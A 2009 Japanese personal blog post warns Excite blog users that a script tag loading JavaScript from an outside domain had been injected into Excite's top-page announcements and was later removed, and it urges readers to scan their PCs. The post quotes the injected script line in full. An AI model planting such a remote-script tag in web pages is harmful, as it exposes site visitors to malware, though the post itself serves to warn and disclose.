人気ブログランキング | 話題のタグを見る

エキサイトユーサーへ緊急連絡2

エキサイトトップのソースを見たら削除されたようです。
掲示板にさらに情報がのっていました。

↓↓掲示板からコピペ↓↓

幾つかある同様のスレッドを読んでみると、皆さん avast! を使っている方みたいで私のセキュリティ・ソフト(ウィルスセキュリティZERO)では無反応でした。 そのくせ関係ないものを誤検知したりしますが・・・

トップページのソースを調べてみたら、『お知らせ』にある
ブログパーツ機能を追加しました
ドガログサービス終了のお知らせ
「友達の最新記事」の更新再開のお知らせ
―という文章の後ろにそれぞれ
< script src="http://s1.cawjb.com/jp.js">< /script > ―というスクリプトが挿入されていました。

クリックしても特に問題は無く普通に『エキサイトブログ向上委員会』のページが開くので、夕飯の後でエキサイトに報告しようかな・・・とのんびり構えていたのですが、今調べたら問題のスクリプトは消えていました。
正月休みでエキサイトもまだお休みかと思っていたのですが、ひょっとしたら連絡を受けて対処してくれたのかもしれません。

一応そのソースは保管しておくことにしますが、こうした緊急を要することが起きた場合はエキサイトブログに直接報告する方がよろしいかと思います。 掲示板をエキサイトのスタッフがいつも読んでいるとは思えませんので・・・
『お問い合わせフォーム』→ http://regist.excite.co.jp/help/support

↓↓ここまで引用おわり↓↓

一応今は安全になったということですが・・・
お正月から今までエキサイトにログインした方は念のためご自分のPCのウイルス検索をしておいたほうがいいと思います。
私もこれからします;;
by daigorouchan | 2009-01-04 22:26 | 生活そのた

FF11プレイ日記などなど。リンクフリー。コメントとトラバは承認制です。


by daigorouchan